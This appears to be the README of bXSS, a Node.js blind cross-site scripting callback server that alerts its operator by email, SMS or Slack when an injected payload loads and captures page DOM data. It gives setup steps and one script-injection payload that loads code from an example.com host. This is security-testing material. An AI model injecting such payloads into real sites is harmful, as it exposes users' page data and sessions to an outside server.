bXSS is a simple Blind XSS application adapted from https://cure53.de/m, you can read about it here.
bXSS will:
- Email when the resource has been loaded via nodemailer
- Send a SMS via Twilio
- Send a Slack Message
- Save to disk to review later (If necessary)
- A server you control
- A usable domain
- A SSL/TLS Certificate, free from Lets Encrypt
- Node.js and Express
- A Gmail account, to send reports via Nodemailer (Optional)
- A Twilio Account (Optional)
- A Slack Token (Optional)
- cd bXSS && npm install
- Update The Configuration || Environment Variables
- Domain
- config.url = Domain intended for use e.g ardern.io
- config.port = Port to run the Node.js app e.g 3030
- Twilio (Optional, if you don't want to use Twilio just delete all Twilio references from the config)
- config.twilio.accountSid = Twilio SID
- config.twilio.authToken = Twilio Auth Token
- config.twilio.to = ['+447500000000','+0018056826043'] Your telephone number(s)
- config.twilio.from = Twilio telephone number
- Slack (Optional, if you don't want to use Slack just delete all Slack references from the config)
- config.slack.token = Slack Token
- config.slack.channel = Channel you want to send the report to
- Slack permissions required channels:read and chat:write
- Gmail (Optional, if you don't want to use Gmail just delete all Gmail references from the config)
- config.gmail.user = Gmail Username
- config.gmail.pass = Gmail Password
- config.gmail.to = ['email1@domain.com','email2@domain.com'] Where you want to send the emails
- config.gmail.from = Who sent the message, usually Gmail Username
- Rename configExample.js to config.js
- Domain
- Start your app (depending on your preference)
- node app.js
- pm2 start app.js
- nodemon app.js
- Obtain a let's Encrypt cert
- I would recommend looking at setting up a reverse proxy, for example in NGINX and skip the next step as I wouldn't want anyone to run express as root.
- Using Node.js
- Update Configuration
- config.letsEncrypt.TLS = true;
- config.letsEncrypt.publicKey = $Path/fullchain.pem
- config.letsEncrypt.privateKey = $Path/privkey.pem
- config.letsEncrypt.ca = $Path/chain.pem
- Update Configuration
- Start your app (depending on your preference)
- node app.js
- npm2 start app.js
- nodemon app.js
Once the application is funcitonal, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:
"><script src="https://example.com/m"></script>
The application has three core functions
- POST - /m (captures DOM information)
- GET - /m (Loads the payload)
- Everything else - Loads alert(1)
This was more of a fun personal project after seeing the example from Mario Heiderich's AppSec Europe training and I wanted to have a reason to write more JavaScript and use some ES6.
This is perfect for my needs, and maybe yours too; I would recommend looking at Sleepy Puppy or XSS Hunter to see if they are appropriate as they are extremly easy to get started with, especially XSS Hunter's online version.
If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.